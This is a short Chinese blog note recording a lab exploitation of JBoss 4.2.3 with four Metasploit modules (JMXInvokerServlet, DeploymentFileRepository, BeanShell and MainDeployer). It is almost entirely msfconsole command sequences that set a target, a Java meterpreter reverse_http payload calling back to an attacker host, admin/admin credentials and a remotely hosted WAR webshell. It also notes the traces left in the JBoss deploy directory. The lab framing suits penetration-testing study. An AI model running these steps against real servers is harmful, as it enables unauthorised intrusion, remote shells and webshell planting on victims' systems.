MSF中Jboss模块直接利用
- 2019 年 11 月 20 日
- 筆記
实验环境:
Kali linux 2018
Windows server 2008 x64
JBOSS 4.2.3
安全检测过程:
在MSF中本身自带一些针对JBOSS漏洞的攻击模块,本次测试使用的JBOSS版本为4.2.3。
利用JMXInvokerServlet接口:
1 msf5 > use exploit/multi/http/jboss_invoke_deploy
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set targeturi /invoker/JMXInvokerServlet (指定 JMXInvokerServlet 接口路径)
5 msf5 > set target 1
6 msf5 > set payload java/meterpreter/reverse_http 这里直接用JAVA payload
7 msf5 > set lhost 192.168.174.130
8 msf5 > set lport 110
9 msf5 > exploit

利用deploymentfilerepository服务:
1 msf5 > use exploit/multi/http/jboss_deploymentfilerepository
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set targeturi /jmx‐console
5 msf5 > set verb POST (这里可以指定不同的请求方法)
6 msf5 > set target 3
7 msf5 > set payloadjava/meterpreter/reverse_http
8 msf5 > set lhost 192.168.174.130
9 msf5 > set lport 110
10 msf5 > exploit

利用BeanShell脚本:
1 msf5 > use exploit/multi/http/jboss_bshdeployer
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set verb POST (这里可以指定不同的请求方法)
5 msf5 > set target 3
6 msf5 > set payload java/meterpreter/reverse_http
7 msf5 > set lhost 192.168.174.130
8 msf5 > set lport 110
9 msf5 > exploit

利用maindeployer远程部署webshell:
1 msf5 > exploit/multi/http/jboss_maindeployer
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set httppassword admin 如果页面加了基础认证,需要加上
5 msf5 > set httpusername admin 账号密码
6 msf5 > set srvhost 192.168.174.130 (这里是提供远程下载war包的webshell:把jsp的webshell打包成war,然后放在自己的服务器上,如何打包参考:
http://www.mianhuage.com/649.html)
7 msf5 > set target 3
8 msf5 > set payload java/meterpreter/reverse_http
9 msf5 > set lhost 192.168.174.130
10 msf5 > set lport 7777
11 msf5 > exploit

所留痕迹:
以上所使用的模块攻击成功后都会在JBOSS目录:
C:jbos.2.3.gaserverdefaulttemdeploy
留下记录


作者:暖痕 (文章转载请注明来自:IT同路人论坛)